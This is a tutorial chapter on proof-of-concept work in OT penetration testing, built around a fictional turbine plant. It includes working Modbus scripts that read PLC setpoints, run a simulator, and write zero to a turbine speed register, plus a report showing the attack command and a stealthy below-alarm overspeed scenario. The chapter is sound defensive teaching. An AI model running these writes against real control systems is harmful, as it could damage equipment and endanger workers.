Proof of concept development¶
Showing what’s possible without actually doing it.
The Patrician has a saying about demonstrations of power: the most effective demonstration is the one you never quite have to perform. The credible threat of action is often more valuable than the action itself, particularly when the action in question might accidentally shut down half the city’s power supply or turn a water treatment plant into an unscheduled chemistry experiment.
Proof of concept development in OT penetration testing is the art of proving we could do something catastrophic without actually doing it.
This is rather more important in OT than in IT. In IT penetration testing, we might actually exfiltrate data (with permission) or actually compromise systems (in a controlled way) to prove impact. In OT, “actually demonstrating” that we can shut down the turbines by shutting down the turbines is the sort of thing that gets people hurt, gets us arrested, and gets the entire concept of security testing banned from the facility for the next decade.
The challenge is demonstrating sufficient proof that stakeholders take the findings seriously, without demonstrating so much proof that we cause actual harm. It’s a delicate balance, like explaining to the Archchancellor that his experimental thaumic reactor has a critical flaw without actually causing it to explode. We need to be convincing enough that he’ll fund the repairs, but not so convincing that we leave a smoking crater where the University used to be.
Understanding safe exploitation boundaries¶
Before writing a single line of exploit code, establish what we are allowed to do and what we are absolutely not allowed to do. These boundaries should be documented, signed off by people with authority, and reviewed by people who understand the actual physical processes involved.
The safe side of the line typically includes reading data from systems, connecting to services, analysing network traffic, and testing authentication mechanisms against non-production systems. The unsafe side includes writing data to production PLCs, stopping running processes, modifying setpoints, and basically anything that could cause a safety system to activate or a production process to fail.
At UU P&L, our initial rules of engagement said we could “test all systems for vulnerabilities but should avoid disrupting operations”. This was fine in theory but useless in practice because it didn’t specify what “disrupting” meant. Was reading holding registers from a PLC disruptive? What about reading them repeatedly? What about reading them whilst the PLC was also controlling an active chemical process? We needed rather more specific boundaries.
Establish clear operational boundaries¶
Work with operations and engineering to define specifically what’s safe:
Which systems are production versus test?
Which operations are read-only versus write?
Which times are acceptable for testing?
Which physical processes must not be affected?
What happens if something goes wrong anyway?
Document these in the rules of engagement and reference them before every test. “The RoE says this is safe” is much better legal protection than “I thought it would probably be fine”.
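One way to make that reference a habit rather than a hope is to encode the RoE as data that every test script consults before touching anything. A minimal sketch, with illustrative hosts, operations, and windows (not UU P&L’s real values):

#!/usr/bin/env python3
"""Pre-flight check: consult the RoE before any test touches a target"""
from datetime import datetime
from datetime import time as dtime

# Encoded from the signed rules of engagement (all values illustrative)
ROE = {
    'production_hosts': {'192.168.10.10', '192.168.10.11', '192.168.10.12'},
    'test_hosts': {'192.168.99.50'},
    'allowed_operations_production': {'read'},      # read-only on production
    'testing_window': (dtime(9, 0), dtime(16, 0)),  # agreed with operations
}

def roe_permits(target_ip, operation, now=None):
    """Return True only if the RoE explicitly allows this test"""
    now = now or datetime.now().time()
    start, end = ROE['testing_window']
    if not (start <= now <= end):
        return False
    if target_ip in ROE['test_hosts']:
        return True  # anything goes on the isolated test rig
    if target_ip in ROE['production_hosts']:
        return operation in ROE['allowed_operations_production']
    return False  # unknown target: not in scope, so not allowed

assert roe_permits('192.168.10.10', 'read', dtime(10, 0))
assert not roe_permits('192.168.10.10', 'write', dtime(10, 0))

A script that refuses to run outside the agreed window is far better legal protection than one that relies on us remembering what day it is.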
Create a safety classification system¶
Not all tests carry equal risk, so classify them:
Green (Safe):
Reading public data
Passive network observation
Testing against simulators
Credential testing on isolated systems
Static analysis of code or configurations
Amber (Proceed with caution):
Reading data from production PLCs
Active scanning of production networks
Testing authentication on production systems
Protocol fuzzing against simulators
Analysing safety system configurations
Red (Requires explicit approval each time):
Any write operations to production systems
Any testing that could trigger alarms
Any testing during critical operations
Testing safety systems
Any testing that requires bypassing safety controls
At UU P&L, we classified “reading the current turbine speed” as green, “reading the turbine speed setpoint” as amber (because it revealed operational information), and “writing a new turbine speed setpoint” as red (because it could actually change physical operations). Before any red test, we had to get explicit approval from operations, confirm that the process was in a safe state, and have someone standing by who could intervene physically if needed.
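The classification can be enforced mechanically rather than relying on memory. A sketch of a simple gate; the test names and approval mechanism are illustrative:

#!/usr/bin/env python3
"""Traffic-light gate: refuse to run a test above its approved level"""

GREEN, AMBER, RED = 'green', 'amber', 'red'

# Classification agreed with operations (illustrative entries)
TEST_CLASSIFICATION = {
    'read_turbine_speed': GREEN,
    'read_speed_setpoint': AMBER,
    'write_speed_setpoint': RED,
}

def run_test(test_name, test_func, red_approval_ref=None):
    """Run a test only if its classification permits it right now"""
    level = TEST_CLASSIFICATION.get(test_name, RED)  # unknown tests default to red
    if level == RED and not red_approval_ref:
        raise PermissionError(
            f"{test_name} is RED-classified: explicit approval reference required"
        )
    if level == AMBER:
        print(f"[!] {test_name} is AMBER: proceeding with caution, logging everything")
    return test_func()

Defaulting unknown tests to red means a forgotten classification fails safe rather than failing open.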
Read-only demonstrations¶
The safest form of proof of concept is demonstrating what we can read rather than what we can change. If we can read process values, configurations, and control parameters, we can often prove impact without actually modifying anything.
Demonstrate data access¶
Reading data from an OT system can demonstrate several impacts:
Intellectual property theft (process parameters, recipes, configurations)
Competitive intelligence (production rates, efficiency metrics)
Pre-attack reconnaissance (system states, normal baselines)
Safety information leakage (alarm thresholds, safety limits)
Create a proof of concept that reads and displays sensitive information:
#!/usr/bin/env python3
"""
Proof of concept: Unauthorised reading of turbine control parameters

This demonstrates that an attacker could read sensitive operational data
including setpoints, alarms, and safety limits from the turbine PLCs.

NOTE: This is a READ-ONLY demonstration. No values are modified.
"""
from pymodbus.client import ModbusTcpClient
import json
from datetime import datetime


def read_turbine_config(plc_ip, unit_id=1):
    """Read turbine configuration without modifying anything"""
    client = ModbusTcpClient(plc_ip, port=502)
    client.connect()

    # Read holding registers (read-only operation)
    # Addresses determined during reconnaissance phase
    config = {}

    # Speed setpoint (register 1000)
    result = client.read_holding_registers(1000, count=1, slave=unit_id)
    if not result.isError():
        config['speed_setpoint_rpm'] = result.registers[0]

    # Temperature alarm threshold (register 1050)
    result = client.read_holding_registers(1050, count=1, slave=unit_id)
    if not result.isError():
        config['temp_alarm_threshold_c'] = result.registers[0]

    # Emergency stop status (register 1100)
    result = client.read_holding_registers(1100, count=1, slave=unit_id)
    if not result.isError():
        config['emergency_stop_active'] = bool(result.registers[0])

    client.close()
    return config


def demonstrate_impact():
    """Show what an attacker could learn from this access"""
    print("[*] Proof of Concept: Unauthorised Turbine Configuration Access")
    print("[*] This is a READ-ONLY demonstration\n")

    # Read from multiple turbines
    turbines = [
        ('192.168.10.10', 'Turbine 1'),
        ('192.168.10.11', 'Turbine 2'),
        ('192.168.10.12', 'Turbine 3')
    ]

    results = {}
    for ip, name in turbines:
        print(f"[*] Reading configuration from {name} ({ip})...")
        config = read_turbine_config(ip)
        results[name] = config
        print(f"    Speed Setpoint: {config['speed_setpoint_rpm']} RPM")
        print(f"    Temperature Alarm: {config['temp_alarm_threshold_c']}°C")
        print(f"    E-Stop Active: {config['emergency_stop_active']}\n")

    # Save results with timestamp
    output = {
        'timestamp': datetime.now().isoformat(),
        'demonstration': 'read_only_turbine_access',
        'turbines': results,
        'impact_notes': [
            'Attacker could monitor operational states in real-time',
            'Configuration data reveals safety margins and operational limits',
            'Historical data collection could reveal production schedules',
            'Information could be used to plan precise manipulation attacks'
        ]
    }

    with open('poc_turbine_read.json', 'w') as f:
        json.dump(output, f, indent=2)

    print("[*] Results saved to poc_turbine_read.json")
    print("[*] No modifications were made to any systems")


if __name__ == '__main__':
    demonstrate_impact()
This proof of concept demonstrates that we can access sensitive operational data, but it never writes anything. We can show stakeholders the output and explain that if we can read these values, a malicious actor could also read them, and could use that information to understand the system before planning an attack.
Demonstrate configuration analysis¶
If we have extracted configurations (ladder logic, HMI projects, SCADA configurations), we can analyse them to show what an attacker could learn:
#!/usr/bin/env python3
"""
Analyse extracted PLC ladder logic to identify security issues

Demonstrates what an attacker learns from configuration access
"""


def analyse_ladder_logic(logic_file):
    """
    Parse ladder logic to identify security-relevant information

    This is simplified; real ladder logic analysis is more complex
    """
    findings = {
        'safety_critical_rungs': [],
        'hardcoded_credentials': [],
        'undocumented_functions': [],
        'alarm_thresholds': [],
        'network_connections': []
    }

    # This would actually parse the ladder logic
    # For the PoC, we're showing what you'd find
    findings['safety_critical_rungs'] = [
        {
            'rung': 127,
            'description': 'Emergency shutdown logic',
            'condition': 'Temperature > 95C OR Pressure > 150 PSI',
            'action': 'Close inlet valve, stop pump'
        }
    ]

    findings['hardcoded_credentials'] = [
        {
            'location': 'Rung 445',
            'credential': 'FTP connection to 192.168.20.10',
            'username': 'admin',
            'password_hash': 'MD5:5f4dcc3b5aa765d61d8327deb882cf99'
        }
    ]

    findings['alarm_thresholds'] = [
        {'parameter': 'Temperature', 'warning': 85, 'critical': 95, 'unit': 'C'},
        {'parameter': 'Pressure', 'warning': 130, 'critical': 150, 'unit': 'PSI'}
    ]

    return findings


def demonstrate_configuration_analysis():
    """Show impact of configuration access"""
    print("[*] Proof of Concept: Ladder Logic Analysis")
    print("[*] Demonstrating information available from extracted configurations\n")

    findings = analyse_ladder_logic('turbine_plc.l5k')

    print("[*] SAFETY-CRITICAL LOGIC DISCOVERED:")
    for item in findings['safety_critical_rungs']:
        print(f"\n    Rung {item['rung']}: {item['description']}")
        print(f"    Condition: {item['condition']}")
        print(f"    Action: {item['action']}")
    print("\n    IMPACT: Attacker knows exact conditions that trigger safety systems")
    print("    Could craft attacks that stay just below these thresholds")

    print("\n[*] HARDCODED CREDENTIALS FOUND:")
    for item in findings['hardcoded_credentials']:
        print(f"\n    Location: {item['location']}")
        print(f"    {item['username']}:{item['password_hash']}")
    print("    IMPACT: Credentials could be cracked offline, used for lateral movement")

    print("\n[*] ALARM THRESHOLDS DISCOVERED:")
    for item in findings['alarm_thresholds']:
        print(f"    {item['parameter']}: Warning={item['warning']}, Critical={item['critical']} {item['unit']}")
    print("    IMPACT: Attacker knows exactly when alarms trigger")
    print("    Could manipulate values to stay below alarm thresholds")


if __name__ == '__main__':
    demonstrate_configuration_analysis()
Simulation environments¶
The most convincing proof of concept is one that actually works, just not against production systems. Build a simulation environment that mirrors the production environment closely enough to demonstrate attacks, but safely enough that nothing real breaks.
Hardware simulation¶
If we have access to spare PLCs or other OT devices, build a test rig:
Test Environment:
Same model PLC as production
Same firmware version
Same ladder logic (or simplified version)
Connected to HMI simulator or test HMI
No physical process connected
At UU P&L, we borrowed a decommissioned turbine PLC, loaded it with a copy of the production ladder logic, and connected it to an HMI running on a laptop. We could then demonstrate attacks against the real hardware without any risk to actual turbines.
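Before trusting results from a rig, confirm that it actually matches production. A sketch that reuses the read-only read_turbine_config() helper from earlier, assuming that script was saved as poc_turbine_read.py; note that the production-side reads are amber operations under the classification above:

#!/usr/bin/env python3
"""Confirm the test rig's configuration matches the production PLC"""
# Reuses the read-only helper from the earlier PoC script
from poc_turbine_read import read_turbine_config

def compare_rig_to_production(rig_ip, production_ip):
    """Diff the register values the PoC relies on; read-only on both sides"""
    rig = read_turbine_config(rig_ip)
    prod = read_turbine_config(production_ip)
    mismatches = {k: (rig.get(k), prod.get(k))
                  for k in set(rig) | set(prod)
                  if rig.get(k) != prod.get(k)}
    if mismatches:
        print("[!] Rig differs from production; results may not transfer:")
        for key, (rig_val, prod_val) in mismatches.items():
            print(f"    {key}: rig={rig_val} production={prod_val}")
    else:
        print("[✓] Rig matches production for all compared registers")
    return mismatches

A rig that drifts out of sync with production gives us confident demonstrations of attacks that would not actually work, which is worse than no demonstration at all.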
Software simulation¶
If hardware is not available, software simulators can demonstrate many attacks:
#!/usr/bin/env python3
"""
Simple Modbus PLC simulator for demonstrating attacks

This mimics the behaviour of the UU P&L turbine PLCs
"""
from pymodbus.server import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSlaveContext, ModbusServerContext


def create_turbine_simulator():
    """Create a simulated turbine PLC"""
    # Initialise data blocks large enough to cover the register
    # addresses used below (setpoints at 1000+, measurements at 2000+)

    # Coils (digital outputs)
    coils = ModbusSequentialDataBlock(0, [0] * 3000)

    # Discrete inputs (digital inputs)
    discrete_inputs = ModbusSequentialDataBlock(0, [0] * 3000)

    # Holding registers (analogue outputs, setpoints)
    # Initialise with "normal" operational values
    holding_registers = ModbusSequentialDataBlock(0, [0] * 3000)
    holding_registers.setValues(1000, [1500])  # Speed setpoint: 1500 RPM
    holding_registers.setValues(1050, [95])    # Temp alarm: 95°C
    holding_registers.setValues(1100, [0])     # E-stop: not active

    # Input registers (analogue inputs, measurements)
    input_registers = ModbusSequentialDataBlock(0, [0] * 3000)
    input_registers.setValues(2000, [1498])  # Current speed: 1498 RPM
    input_registers.setValues(2050, [72])    # Current temp: 72°C

    # Create the slave context
    store = ModbusSlaveContext(
        di=discrete_inputs,
        co=coils,
        hr=holding_registers,
        ir=input_registers
    )
    context = ModbusServerContext(slaves=store, single=True)

    # Device identification
    identity = ModbusDeviceIdentification()
    identity.VendorName = 'UU P&L'
    identity.ProductCode = 'TURBINE-PLC'
    identity.VendorUrl = 'http://uu.edu'
    identity.ProductName = 'Turbine Controller'
    identity.ModelName = 'TC-1500'
    identity.MajorMinorRevision = '2.3.1'

    return context, identity


if __name__ == '__main__':
    context, identity = create_turbine_simulator()
    print("[*] Starting UU P&L Turbine PLC Simulator")
    print("[*] Listening on 0.0.0.0:502")
    print("[*] This simulator mimics production PLC behaviour")
    print("[*] Safe for testing attacks without impacting real systems\n")
    StartTcpServer(context=context, identity=identity, address=("0.0.0.0", 502))
We can then run attacks against this simulator and record the results:
#!/usr/bin/env python3
"""
Demonstrate turbine shutdown attack against simulator
"""
from pymodbus.client import ModbusTcpClient
import time


def demonstrate_shutdown_attack(simulator_ip):
    """
    Proof of concept: Turbine emergency shutdown via Modbus

    Running against SIMULATOR ONLY
    """
    print("[*] Proof of Concept: Unauthorised Turbine Shutdown")
    print(f"[*] Target: SIMULATOR at {simulator_ip}")
    print("[*] This demonstrates what an attacker could do to production systems\n")

    client = ModbusTcpClient(simulator_ip, port=502)
    client.connect()

    # Read current state
    print("[*] Reading current turbine state...")
    speed = client.read_input_registers(2000, count=1, slave=1)
    print(f"    Current speed: {speed.registers[0]} RPM")

    setpoint = client.read_holding_registers(1000, count=1, slave=1)
    print(f"    Current setpoint: {setpoint.registers[0]} RPM\n")

    # Demonstrate attack
    print("[*] Executing attack: Writing zero to speed setpoint register...")
    result = client.write_register(1000, 0, slave=1)

    if not result.isError():
        print("[✓] Write successful")
        print("\n[*] In production, this would cause:")
        print("    1. Turbine to begin emergency deceleration")
        print("    2. Possible activation of safety systems")
        print("    3. Loss of power generation")
        print("    4. Potential damage to turbine from rapid speed change")
        print("\n[*] Attack successful against simulator")
        print("[*] In production, this would require immediate operator intervention")
    else:
        print("[✗] Write failed")

    # Verify change
    time.sleep(1)
    new_setpoint = client.read_holding_registers(1000, count=1, slave=1)
    print(f"\n[*] Verified: New setpoint is {new_setpoint.registers[0]} RPM")

    client.close()


if __name__ == '__main__':
    # ALWAYS AGAINST SIMULATOR
    demonstrate_shutdown_attack('127.0.0.1')
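Alongside the script’s output, it’s worth capturing the raw Modbus exchange while the PoC runs, so the report can include packet-level evidence. A minimal sketch using scapy, which is an assumption on our part; tcpdump or Wireshark against the loopback interface works just as well:

#!/usr/bin/env python3
"""Capture the Modbus traffic generated by a PoC run as evidence"""
from scapy.all import sniff, wrpcap  # assumes scapy is installed

def capture_poc_evidence(duration=30, iface='lo', outfile='poc_modbus.pcap'):
    """Sniff Modbus/TCP traffic for the duration of the PoC and save it"""
    print(f"[*] Capturing tcp port 502 on {iface} for {duration}s...")
    packets = sniff(filter='tcp port 502', iface=iface, timeout=duration)
    wrpcap(outfile, packets)
    print(f"[*] {len(packets)} packets saved to {outfile}")
    return outfile

if __name__ == '__main__':
    # Start this first, then run the shutdown PoC against 127.0.0.1
    capture_poc_evidence()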
Video proof of concepts¶
When we cannot safely perform an attack against real systems, record a video of the attack against a simulator. This provides visual evidence that is more compelling than a written description, without the risks of testing production systems.
Create professional demonstrations¶
A good PoC video should:
Clearly identify that it’s a simulation
Show the initial system state
Execute the attack with explanation
Show the resulting system state
Explain the production impact
Recording structure¶
[Opening screen]
"Proof of Concept: Unauthorised Turbine Control"
"Demonstration against SIMULATOR ONLY"
"UU P&L Penetration Test - December 2024"
[Screen 1: Network diagram]
Show the attack path from entry point to target
Highlight each step of lateral movement
"This demonstrates the attack path available in production"
[Screen 2: Normal operations]
Show HMI displaying normal turbine operation
Speed: 1500 RPM, Temperature: 72°C
"Current production state: Normal operations"
[Screen 3: Attack execution]
Terminal window showing the attack script
Execute the script step-by-step with commentary
Show each Modbus command and response
[Screen 4: Impact]
Show HMI displaying changed values
Speed setpoint now 0 RPM
Alarm indicators activating
"In production, this would cause emergency shutdown"
[Screen 5: Impact explanation]
Text overlay explaining consequences:
- Production loss
- Equipment stress
- Safety system activation
- Recovery time required
[Closing screen]
"This vulnerability exists in production"
"No authentication required for Modbus commands"
"Recommendation: Implement authentication and network segmentation"
At UU P&L, we created a video showing the entire attack chain from initial access to final impact. We started with a screen recording of connecting to the guest Wi-Fi, showed the pivot to the contractor laptop, demonstrated the lateral movement to the engineering workstation, and finally showed the connection to the PLC simulator and the execution of the attack. The video ran for eight minutes and was far more convincing than any written report could have been.
Documentation of theoretical impacts¶
When we can’t demonstrate an attack even in simulation (perhaps because we don’t have access to the specific hardware or the attack would require physical presence we haven’t been granted), document the theoretical impact with sufficient detail that stakeholders understand the risk.
Structure theoretical impact documentation¶
# Vulnerability: Unauthenticated Modbus Access to Turbine PLCs
## Technical Details
Affected Systems:
- Turbine PLCs: 192.168.10.10-12
- Manufacturer: Allen-Bradley
- Model: ControlLogix 5500
- Firmware: 20.11
Vulnerability:
Modbus TCP service (port 502) accessible from engineering network with no authentication required.
## Attack Prerequisites
Required Access:
- Network connectivity to 192.168.10.0/24
- Available via engineering workstation network (see vulnerability V-042)
Required Skills:
- Basic Modbus protocol knowledge
- Available tools: pymodbus, mbtget, any Modbus client
Required Time:
- < 5 minutes to identify vulnerable PLCs
- < 1 minute to execute commands
## Attack Scenario
1. Attacker gains access to engineering network
2. Scans for Modbus services: `nmap -p 502 192.168.10.0/24`
3. Identifies turbine PLCs responding on port 502
4. Reads current configuration to understand register mapping
5. Writes malicious values to control registers
Example Attack Command:
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.10.10')
client.connect()
# Write zero to speed setpoint (emergency stop)
client.write_register(1000, 0, slave=1)
## Impact Analysis
### Immediate Physical Impact
Turbine Shutdown:
- Writing 0 to speed setpoint register causes immediate deceleration
- Turbine designed for controlled shutdown over 5-minute period
- Immediate shutdown causes mechanical stress
Safety System Response:
- Emergency stop systems would activate
- Backup generator would engage (30-second delay)
- Critical loads would experience brief power loss
### Operational Impact
Production loss:
- Each turbine generates 15MW
- Current electricity price: €85/MWh
- Loss per turbine per hour: €1,275
- Three turbines down: €3,825/hour
Recovery time:
- Turbine restart procedure: 2 hours minimum
- Safety system reset: 30 minutes
- System checks required: 1 hour
- Total downtime: ~3.5 hours minimum
Financial impact (single attack):
- Production loss: €13,387.50
- Maintenance inspection: €5,000 (stress damage check)
- Emergency response: €2,000
- Total: ~€20,400
### Safety Impact
Potential Risks:
- Sudden speed change increases bearing stress
- Repeated attacks could cause premature bearing failure
- Bearing failure on rotating machinery is a serious safety risk
- Personnel typically present in turbine hall during operations
Mitigation (Current):
- Physical emergency stops available
- Operators can manually override PLC commands
- Safety systems independent of Modbus control
Risk Level:
Medium: Attack would be noticed quickly, operators can intervene, but repeated attacks could cause cumulative damage
### Worst-Case Scenario
If an attacker modified turbine parameters subtly rather than shutting down completely:
- Gradual overspeed (e.g., 1510 RPM instead of 1500)
- Below alarm threshold (1550 RPM)
- Causes accelerated wear
- Could lead to catastrophic failure weeks later
- Failure of spinning turbine could send shrapnel through turbine hall
This worst-case scenario carries a much higher safety risk but would be harder to detect.
## Evidence
Network Access Confirmed:
- Successfully connected to 192.168.10.10:502 from engineering workstation
- Modbus service responded to query commands
- Successfully read holding registers (read-only test)
Attack Feasibility:
- PoC script developed and tested against simulator
- Simulator exhibited expected behaviour (speed changed as commanded)
- No technical barriers to production attack
- Only ethical constraints prevented production test
## Recommendations
Immediate (< 1 week):
1. Implement network ACLs to restrict Modbus access
2. Monitor Modbus traffic for unexpected write commands
3. Document baseline of legitimate Modbus operations
Short-term (< 1 month):
1. Deploy Modbus firewall with write command filtering
2. Implement role-based access for Modbus operations
3. Add alerting for write operations to critical registers
Long-term (< 6 months):
1. Migrate to authenticated protocol (Modbus/TCP Security)
2. Implement proper network segmentation (separate control VLANs)
3. Deploy IDS with OT protocol awareness
## References
- CVE-2015-6574: Modbus lacks authentication (by design)
- ICS-CERT Advisory ICSA-19-211-01: Modbus vulnerabilities
- ISA/IEC 62443: Industrial network security standards
This level of documentation provides enough detail that stakeholders can understand the risk even without seeing a live demonstration. We have explained what is possible, why it is possible, what the impact would be, and what can be done about it.
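Where a theoretical write-up leans on numbers, show the working so stakeholders can challenge the assumptions rather than the arithmetic. A quick check of the figures above:

#!/usr/bin/env python3
"""Reproduce the financial impact figures from the stated assumptions"""
turbines = 3
mw_per_turbine = 15
price_eur_per_mwh = 85
downtime_hours = 3.5

loss_per_turbine_hour = mw_per_turbine * price_eur_per_mwh   # €1,275
loss_all_turbines_hour = loss_per_turbine_hour * turbines    # €3,825
production_loss = loss_all_turbines_hour * downtime_hours    # €13,387.50
total = production_loss + 5000 + 2000                        # + inspection + response

print(f"Production loss: €{production_loss:,.2f}")  # €13,387.50
print(f"Total: €{total:,.2f}")                      # €20,387.50 (~€20,400)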
Responsible disclosure considerations¶
If we discover vulnerabilities in commercial products during our testing, we have ethical obligations beyond just reporting to our client.
Vendor notification¶
If the vulnerability is in a product used by other organisations:
Notify the vendor first (before public disclosure)
Provide sufficient detail that they can reproduce
Allow reasonable time for patching (typically 90 days)
Coordinate disclosure with vendor
ICS-CERT coordination¶
For critical infrastructure vulnerabilities, notify the relevant coordinating authority (in the US, ICS-CERT):
They can coordinate with vendors
They can issue advisories to other users
They can help with responsible disclosure timeline
Client notification boundaries¶
Our client needs to know about the vulnerabilities we found, but we should:
Not provide full exploit code unless necessary
Consider whether the report might be shared
Redact sensitive details if report will be widely distributed
Ensure exploits are not trivially weaponisable from report alone
At UU P&L, we discovered a zero-day vulnerability in a popular industrial firewall. The vulnerability allowed authentication bypass via a crafted HTTP request. We:
Notified the vendor immediately with proof of concept
Notified ICS-CERT with coordination details
Provided our client with detailed mitigation steps
Did not include full exploit code in the written report
Agreed on 90-day disclosure timeline with vendor
Published advisory after patch was available
The vendor patched within 45 days, we publicly disclosed at 90 days, and UU P&L received recognition for responsible disclosure. Everyone wins, except attackers who had a slightly smaller attack surface to work with.
The balance of proof and safety¶
The fundamental tension in OT penetration testing proof-of-concept development is this: we need to prove that something dangerous is possible without actually doing the dangerous thing. It’s like proving we could rob a bank by showing the vault’s blueprints, demonstrating that we can pick the lock on a replica, and explaining our exit strategy, all without taking any money from the actual bank.
This requires more creativity than IT penetration testing, where “proof” often means “I actually did it and here’s the data I exfiltrated”. In OT, proof means “I could have done it and here’s everything that makes that claim credible short of actually doing it”.
The more evidence we can provide short of actually manipulating production systems, the better. Simulator attacks are better than theoretical descriptions. Videos are better than static screenshots. Detailed technical analysis is better than “trust me, this would work”. But never, ever cross the line into actually doing something that could cause harm, no matter how certain we are that it would be safe. The moment something goes wrong, “I was sure it would be fine” stops being a defence and becomes evidence of negligence.
Document everything we can safely demonstrate, explain clearly what we can’t safely demonstrate and why, and trust that if we have done our job properly, the stakeholders will understand the risk even without seeing production systems fall over. If they don’t believe us without a live demonstration, they’re not going to respond appropriately to the findings anyway, and demonstrating on production systems will not fix that particular organisational problem.